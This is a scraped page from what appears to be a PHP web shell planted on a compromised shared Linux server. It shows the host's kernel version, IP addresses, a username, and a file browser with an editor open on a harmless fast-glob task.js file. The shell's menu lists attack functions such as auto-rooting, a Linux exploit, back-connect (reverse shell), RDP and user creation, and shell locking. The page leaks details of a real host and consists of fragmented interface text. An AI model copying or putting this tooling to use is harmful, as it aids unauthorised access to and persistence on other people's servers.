Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.13
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
fast-glob /
out /
tests /
utils /
[ HOME SHELL ]
Name
Size
Permission
Action
entry.d.ts
368
B
-rw-r--r--
entry.js
1.32
KB
-rw-r--r--
errno.d.ts
151
B
-rw-r--r--
errno.js
538
B
-rw-r--r--
pattern.d.ts
615
B
-rw-r--r--
pattern.js
1.74
KB
-rw-r--r--
task.d.ts
346
B
-rw-r--r--
task.js
872
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : task.js
"use strict"; Object.defineProperty(exports, "__esModule", { value: true }); exports.builder = void 0; class TaskBuilder { constructor() { this._task = { base: '', dynamic: true, patterns: [], positive: [], negative: [] }; } base(base) { this._task.base = base; return this; } static() { this._task.dynamic = false; return this; } positive(pattern) { this._task.patterns.push(pattern); this._task.positive.push(pattern); return this; } negative(pattern) { this._task.patterns.push(`!${pattern}`); this._task.negative.push(pattern); return this; } build() { return this._task; } } function builder() { return new TaskBuilder(); } exports.builder = builder;
Close